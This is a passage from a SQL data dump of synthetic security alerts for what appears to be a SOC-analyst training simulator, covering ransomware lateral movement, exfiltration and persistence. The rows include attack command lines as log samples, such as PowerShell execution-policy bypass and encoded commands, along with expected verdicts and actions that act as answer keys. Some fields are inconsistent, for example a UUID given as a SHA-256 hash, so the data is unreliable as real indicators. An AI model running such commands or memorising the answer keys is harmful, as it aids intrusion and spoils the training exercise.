task.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_garmin\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_directory\",\"verdict\":\"clean\",\"details\":\"Username associated with the scheduled task creation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.654Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateTasks\\\\\\\\CriticalUpdate\\\",\\\"author\\\":\\\"SYSTEM\\\",\\\"trigger\\\":\\\"Daily\\\",\\\"action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c start C:\\\\\\\\malware\\\\\\\\evil_task.exe\\\",\\\"target_ip\\\":\\\"192.168.45.8\\\",\\\"attacker_ip\\\":\\\"45.76.123.55\\\",\\\"malware_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"username\\\":\\\"admin_garmin\\\",\\\"status\\\":\\\"Scheduled\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.654Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateTasks\\\\\\\\CriticalUpdate\\\",\\\"author\\\":\\\"SYSTEM\\\",\\\"trigger\\\":\\\"Daily\\\",\\\"action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c start 
C:\\\\\\\\malware\\\\\\\\evil_task.exe\\\",\\\"target_ip\\\":\\\"192.168.45.8\\\",\\\"attacker_ip\\\":\\\"45.76.123.55\\\",\\\"malware_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"username\\\":\\\"admin_garmin\\\",\\\"status\\\":\\\"Scheduled\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.654Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateTasks\\\\\\\\CriticalUpdate\\\",\\\"author\\\":\\\"SYSTEM\\\",\\\"trigger\\\":\\\"Daily\\\",\\\"action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c start C:\\\\\\\\malware\\\\\\\\evil_task.exe\\\",\\\"target_ip\\\":\\\"192.168.45.8\\\",\\\"attacker_ip\\\":\\\"45.76.123.55\\\",\\\"malware_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"username\\\":\\\"admin_garmin\\\",\\\"status\\\":\\\"Scheduled\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.654Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateTasks\\\\\\\\CriticalUpdate\\\",\\\"author\\\":\\\"SYSTEM\\\",\\\"trigger\\\":\\\"Daily\\\",\\\"action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c start C:\\\\\\\\malware\\\\\\\\evil_task.exe\\\",\\\"target_ip\\\":\\\"192.168.45.8\\\",\\\"attacker_ip\\\":\\\"45.76.123.55\\\",\\\"malware_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"username\\\":\\\"admin_garmin\\\",\\\"status\\\":\\\"Scheduled\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.654Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateTasks\\\\\\\\CriticalUpdate\\\",\\\"author\\\":\\\"SYSTEM\\\",\\\"trigger\\\":\\\"Daily\\\",\\\"action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c start C:\\\\\\\\malware\\\\\\\\evil_task.exe\\\",\\\"target_ip\\\":\\\"192.168.45.8\\\",\\\"attacker_ip\\\":\\\"45.76.123.55\\\",\\\"malware_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"username\\\":\\\"admin_garmin\\\",\\\"status\\\":\\\"Scheduled\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(968, 'Lateral Movement via RDP Detected', 'high', 'Remote Desktop Protocol (RDP) Logs', 'The attackers have utilized RDP to conduct lateral movement within Garmin\'s network, compromising additional systems to maximize the ransomware\'s impact.', 'Movement within Network', 'T1021.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T03:22:45Z\",\"event_id\":\"4624\",\"event_type\":\"logon_success\",\"source_ip\":\"203.0.113.15\",\"destination_ip\":\"10.0.5.23\",\"username\":\"jdoe_admin\",\"logon_type\":\"10\",\"logon_process\":\"User32\",\"authentication_package\":\"Negotiate\",\"status\":\"Success\",\"session_id\":\"0x3e7\",\"host\":\"GARMIN-SERVER1\",\"malware_hash\":\"58a9e13c1a2d4c4b8fbfd6a7d60bbabc\",\"filename\":\"rdp_movement_tool.exe\"}', '2026-01-17 03:38:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with ransomware distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Privileged account used in unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"58a9e13c1a2d4c4b8fbfd6a7d60bbabc\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known lateral movement tools.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"rdp_movement_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint 
Detection\",\"verdict\":\"malicious\",\"details\":\"Filename of tool used for lateral movement via RDP.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.656Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:22:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"logon_success\\\",\\\"source_ip\\\":\\\"203.0.113.15\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"logon_type\\\":\\\"10\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"status\\\":\\\"Success\\\",\\\"session_id\\\":\\\"0x3e7\\\",\\\"host\\\":\\\"GARMIN-SERVER1\\\",\\\"malware_hash\\\":\\\"58a9e13c1a2d4c4b8fbfd6a7d60bbabc\\\",\\\"filename\\\":\\\"rdp_movement_tool.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.656Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:22:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"logon_success\\\",\\\"source_ip\\\":\\\"203.0.113.15\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"logon_type\\\":\\\"10\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"status\\\":\\\"Success\\\",\\\"session_id\\\":\\\"0x3e7\\\",\\\"host\\\":\\\"GARMIN-SERVER1\\\",\\\"malware_hash\\\":\\\"58a9e13c1a2d4c4b8fbfd6a7d60bbabc\\\",\\\"filename\\\":\\\"rdp_movement_tool.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.656Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:22:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"logon_success\\\",\\\"source_ip\\\":\\\"203.0.113.15\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"logon_type\\\":\\\"10\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"status\\\":\\\"Success\\\",\\\"session_id\\\":\\\"0x3e7\\\",\\\"host\\\":\\\"GARMIN-SERVER1\\\",\\\"malware_hash\\\":\\\"58a9e13c1a2d4c4b8fbfd6a7d60bbabc\\\",\\\"filename\\\":\\\"rdp_movement_tool.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.656Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:22:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"logon_success\\\",\\\"source_ip\\\":\\\"203.0.113.15\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"logon_type\\\":\\\"10\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"status\\\":\\\"Success\\\",\\\"session_id\\\":\\\"0x3e7\\\",\\\"host\\\":\\\"GARMIN-SERVER1\\\",\\\"malware_hash\\\":\\\"58a9e13c1a2d4c4b8fbfd6a7d60bbabc\\\",\\\"filename\\\":\\\"rdp_movement_tool.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.656Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:22:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"logon_success\\\",\\\"source_ip\\\":\\\"203.0.113.15\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"logon_type\\\":\\\"10\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"status\\\":\\\"Success\\\",\\\"session_id\\\":\\\"0x3e7\\\",\\\"host\\\":\\\"GARMIN-SERVER1\\\",\\\"malware_hash\\\":\\\"58a9e13c1a2d4c4b8fbfd6a7d60bbabc\\\",\\\"filename\\\":\\\"rdp_movement_tool.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(969, 'Data Exfiltration and Encryption - Final Stage', 'critical', 'Network Traffic Analysis', 'Evil Corp successfully exfiltrated sensitive data and encrypted critical systems, demanding a $10 million ransom. This action has caused significant service disruption and poses risks regarding data privacy and potential sanctions evasion.', 'Data Breach', 'T1020 - Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-01T14:52:30Z\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"185.199.108.153\",\"action\":\"exfiltration\",\"protocol\":\"HTTPS\",\"file_exfiltrated\":\"sensitive_data.zip\",\"hash\":\"3b1c83d776f1a7e6b9e5f6c7d1234abc\",\"user\":\"jdoe\",\"ransom_note\":\"RansomNote.txt\",\"ransom_amount\":\"$10 million\",\"encryption_status\":\"Complete\",\"event_id\":\"evt-2023-10-01-0005\"}', '2026-01-17 03:38:37', '2026-02-16 17:53:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint_db\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b1c83d776f1a7e6b9e5f6c7d1234abc\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ransomware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"sensitive_data.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Unusual file exfiltrated\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"User account involved in unusual 
activity\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(970, 'Suspicious Network Activity Detected', 'high', 'Network Intrusion Detection System (NIDS)', 'An alarming spike in network traffic has been detected, indicating potential intrusion attempts by LockerGoga exploiting known vulnerabilities in remote access services. The initial access phase involves suspicious connections from an external IP attempting to exploit a vulnerable service.', 'Initial Access', 'T1190 - Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"protocol\":\"TCP\",\"destination_port\":3389,\"event_type\":\"Exploit Attempt\",\"payload\":{\"attack_vector\":\"RDP Exploit\",\"malware_name\":\"LockerGoga\",\"malware_hash\":\"2c1743a391305fbf367df8e4f069f9f9\",\"username\":\"admin\"},\"alert_metadata\":{\"nids_id\":\"NIDS-2023-1001\",\"severity\":\"High\"}}', '2026-01-17 03:39:18', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known LockerGoga attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Corporate network server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"2c1743a391305fbf367df8e4f069f9f9\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash known to be associated with LockerGoga ransomware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Policy\",\"verdict\":\"internal\",\"details\":\"Common administrator 
account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(971, 'Malware Execution Observed', 'critical', 'Endpoint Detection and Response (EDR)', 'Following initial access, the attacker deploys the LockerGoga ransomware, which begins encrypting files on the infected systems, indicating the execution phase of the attack.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T08:45:23Z\",\"event_id\":\"4624\",\"user\":\"compromised_user\",\"src_ip\":\"203.0.113.45\",\"dest_ip\":\"10.0.0.25\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\compromised_user\\\\AppData\\\\Roaming\\\\LockerGoga\\\\encrypt.ps1\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Roaming\\\\LockerGoga\\\\encrypt.ps1\",\"action\":\"File encryption started\"}', '2026-01-17 03:39:18', '2026-02-16 17:52:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with ransomware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised system\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash associated with LockerGoga ransomware payload\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"encrypt.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"malicious\",\"details\":\"Ransomware script executed on the 
host\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(972, 'Unauthorized Scheduled Task Created', 'high', 'System Logs', 'A new scheduled task was created to execute a ransomware payload upon system start-up. This is indicative of an advanced persistence technique to maintain access after system reboots.', 'Persistence', 'T1053.005 - Scheduled Task/Job: Scheduled Task', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"event_id\":\"4698\",\"event_source\":\"Microsoft-Windows-TaskScheduler\",\"task_name\":\"\\\\Windows\\\\System32\\\\Tasks\\\\RansomwareTask\",\"task_action\":\"Create\",\"task_user\":\"SYSTEM\",\"trigger_type\":\"AtStartup\",\"action_type\":\"Execute\",\"action_command\":\"C:\\\\Windows\\\\System32\\\\ransomware.exe\",\"action_arguments\":\"/silent\",\"launcher_ip\":\"192.168.1.55\",\"attacker_ip\":\"203.0.113.45\",\"binary_sha256\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"username\":\"compromised_user\"}', '2026-01-17 03:39:18', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network_scan\",\"verdict\":\"internal\",\"details\":\"Internal host likely compromised.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP associated with known ransomware distribution.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known ransomware variant.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_activity_logs\",\"verdict\":\"suspicious\",\"details\":\"User account used to create unauthorized 
task.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.660Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"event_source\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"task_name\\\":\\\"\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\RansomwareTask\\\",\\\"task_action\\\":\\\"Create\\\",\\\"task_user\\\":\\\"SYSTEM\\\",\\\"trigger_type\\\":\\\"AtStartup\\\",\\\"action_type\\\":\\\"Execute\\\",\\\"action_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\ransomware.exe\\\",\\\"action_arguments\\\":\\\"/silent\\\",\\\"launcher_ip\\\":\\\"192.168.1.55\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"binary_sha256\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.660Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"event_source\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"task_name\\\":\\\"\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\RansomwareTask\\\",\\\"task_action\\\":\\\"Create\\\",\\\"task_user\\\":\\\"SYSTEM\\\",\\\"trigger_type\\\":\\\"AtStartup\\\",\\\"action_type\\\":\\\"Execute\\\",\\\"action_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\ransomware.exe\\\",\\\"action_arguments\\\":\\\"/silent\\\",\\\"launcher_ip\\\":\\\"192.168.1.55\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"binary_sha256\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.660Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"event_source\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"task_name\\\":\\\"\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\RansomwareTask\\\",\\\"task_action\\\":\\\"Create\\\",\\\"task_user\\\":\\\"SYSTEM\\\",\\\"trigger_type\\\":\\\"AtStartup\\\",\\\"action_type\\\":\\\"Execute\\\",\\\"action_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\ransomware.exe\\\",\\\"action_arguments\\\":\\\"/silent\\\",\\\"launcher_ip\\\":\\\"192.168.1.55\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"binary_sha256\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.660Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"event_source\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"task_name\\\":\\\"\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\RansomwareTask\\\",\\\"task_action\\\":\\\"Create\\\",\\\"task_user\\\":\\\"SYSTEM\\\",\\\"trigger_type\\\":\\\"AtStartup\\\",\\\"action_type\\\":\\\"Execute\\\",\\\"action_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\ransomware.exe\\\",\\\"action_arguments\\\":\\\"/silent\\\",\\\"launcher_ip\\\":\\\"192.168.1.55\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"binary_sha256\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.660Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 